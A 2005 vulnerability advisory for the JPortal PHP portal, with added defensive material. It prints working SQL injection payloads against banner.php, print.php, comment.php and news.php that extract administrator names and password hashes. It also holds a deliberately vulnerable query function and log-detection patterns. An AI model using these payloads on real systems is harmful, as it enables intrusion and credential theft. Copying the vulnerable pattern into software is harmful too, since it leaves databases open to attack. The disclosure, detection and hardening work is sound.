DATE:
=========
3/11/2005
AFFECTED PRODUCTS
=================
JPORTAL
all versions
OVERVIEW
========
JpoRtaL is a simple portal system written in PHP with MySQL on the
backend. It includes article posting (with comments and topics), a links
manager (with sections), a download manager (with sections), a short news
manager, and block and user managers. Themes (two new themes are now
included) and languages can also be changed. Since 0.6 JpoRtaL has used a
simple admin system for editing and deleting articles, blocks, links, etc.
Available in English and Czech.
Vulnerability:
==============
1. SQL Injection
Overview:
=========
1.
An unauthenticated attacker may execute arbitrary SQL statements on
the vulnerable system. This may compromise the integrity of your
database and expose sensitive information.
Example:
========
1. Go to http://[victim]/jportal/banner.php and try this:
' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1
and then:
' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL from admins where '1=1
After that, you obtain the administrator's login and password.
2. print.php?what=article&id=<article id>%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id, id,id,id%20from%20admins%20LIMIT%201
3.
http://[address]/comment.php?what=news&id=<news id>
and 1=0 union (select null, null, nick, null, null, null, null, null, null,
null, null, null from admins limit n,1)
returns the admin nick
http://[address]/comment.php?what=news&id=<news id>
and 1=0 union (select null, null, pass, null, null, null, null, null, null,
null, null, null from admins limit n,1)
returns the admin's MD5 password hash
4.
print.php?what=article&id=<article id> AND 1=0 UNION SELECT
id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
news.php?id=<news id>%20AND%200%20=%201%20UNION%20SELECT%20*, %201,%201,%201,%201%20FROM%20admins%20--
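Every request above shares one shape: a numeric id parameter to one of the affected scripts followed by a UNION SELECT that reads from the admins table. The following detection routine, added here as an example and not part of the advisory or of JPortal, scans web server access-log lines for that shape. The log lines are constructed for the example and assume the Apache combined log format; the list of affected scripts is taken from the advisory.

```php
<?php
// Added example (not from the advisory or JPortal): flag requests to the
// affected scripts whose decoded query string carries the UNION SELECT
// shape shown in the advisory. Log lines are constructed; the combined
// log format is an assumption.

const AFFECTED_SCRIPTS = ['banner.php', 'print.php', 'comment.php', 'news.php'];

// Returns one entry per suspicious request: the script path and the
// decoded query string that triggered the match.
function find_sqli_requests(array $logLines): array
{
    $hits = [];
    foreach ($logLines as $line) {
        // Pull the request target out of: "GET /jportal/print.php?... HTTP/1.1"
        if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
            continue;
        }
        $path  = parse_url($m[1], PHP_URL_PATH)  ?: '';
        $query = parse_url($m[1], PHP_URL_QUERY) ?: '';
        if (!in_array(basename($path), AFFECTED_SCRIPTS, true)) {
            continue;                       // not one of the vulnerable scripts
        }
        // Decode twice to also catch %2520-style double encoding, treat '+'
        // as a space, and collapse whitespace so "UNION%20SELECT" and
        // "union+select" look the same to the pattern below.
        $decoded = rawurldecode(rawurldecode(str_replace('+', ' ', $query)));
        $decoded = preg_replace('/\s+/', ' ', $decoded);
        if (preg_match('/\bunion\b.*\bselect\b/i', $decoded)
            || preg_match('/\bfrom\s+admins\b/i', $decoded)) {
            $hits[] = ['path' => $path, 'query' => $decoded];
        }
    }
    return $hits;
}

// Constructed sample: one benign request, one injection attempt against
// print.php, and one benign request to a script that is not affected.
$sample = [
    '10.0.0.5 - - [11/Mar/2005:10:01:02 +0100] "GET /jportal/news.php?id=12 HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/Mar/2005:10:01:07 +0100] "GET /jportal/print.php?what=article&id=12%20AND%201=0%20UNION%20SELECT%20id,id,nick,pass,id,id,id,id,id%20from%20admins%20LIMIT%201 HTTP/1.1" 200 734',
    '10.0.0.9 - - [11/Mar/2005:10:01:09 +0100] "GET /jportal/index.php?q=union+select+essay HTTP/1.1" 200 900',
];

foreach (find_sqli_requests($sample) as $hit) {
    echo $hit['path'], ' <- ', $hit['query'], PHP_EOL;   // prints only the print.php request
}
```

The "from admins" clause is matched on its own because it names the table that all of the advisory's payloads read; the UNION/SELECT pattern catches variants that target other tables. Both patterns are crude and will miss comment-based or heavily encoded variants, so treat a hit as a trigger for review rather than as proof of compromise.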
Solution:
=========
1. Vendor not contacted
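No vendor fix is referenced, so the following shows, as an added example that is not JPortal's code, the pattern the advisory describes (a request parameter spliced into SQL text) beside a hardened replacement using an allowlist for the what parameter, strict integer validation of id, and a bound parameter. The table names, column names and database credentials are assumptions for illustration; the hardened function uses mysqli prepared statements and get_result(), which requires the mysqlnd driver.

```php
<?php
// Added example (not JPortal's code). Table/column names and credentials
// are assumed for illustration.

// --- Vulnerable pattern: the request parameters become part of the SQL
// text, so "id=5 AND 1=0 UNION SELECT ..." changes what the query returns.
function fetch_item_vulnerable(mysqli $db, string $what, string $id): ?array
{
    $sql = "SELECT * FROM $what WHERE id = $id";     // string concatenation
    $result = $db->query($sql);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// --- Hardened version.
// 1. $what is mapped through a fixed allowlist; it can never name an
//    arbitrary table or carry SQL syntax.
// 2. $id must be a plain positive decimal integer; anything else is
//    rejected before any SQL is built (this alone stops the "id>%20AND..."
//    form from the advisory).
// 3. The id is bound as a parameter, so it is always data, never syntax.
const ALLOWED_TABLES = ['article' => 'articles', 'news' => 'news'];   // assumed names

function fetch_item_hardened(mysqli $db, string $what, string $id): ?array
{
    if (!array_key_exists($what, ALLOWED_TABLES)) {
        return null;                                 // unknown object type
    }
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $id)) {
        return null;                                 // not a plain positive integer
    }
    $table = ALLOWED_TABLES[$what];                  // from the allowlist, not the user
    $stmt = $db->prepare("SELECT id, title, body FROM `$table` WHERE id = ?");
    if ($stmt === false) {
        return null;
    }
    $idInt = (int) $id;
    $stmt->bind_param('i', $idInt);                  // bound as integer
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();       // needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

// Usage, e.g. at the top of print.php (credentials are assumed):
//   $db  = new mysqli('localhost', 'jportal', 'secret', 'jportal');
//   $row = fetch_item_hardened($db, $_GET['what'] ?? '', $_GET['id'] ?? '');
//   if ($row === null) { http_response_code(404); exit; }
```

The integer check is deliberately stricter than a cast: `(int) "12 AND 1=0 UNION ..."` would silently yield 12 and hide the attempt, whereas rejecting the value lets the application log it. Selecting named columns instead of `*` also limits what a future injection elsewhere could expose through this query.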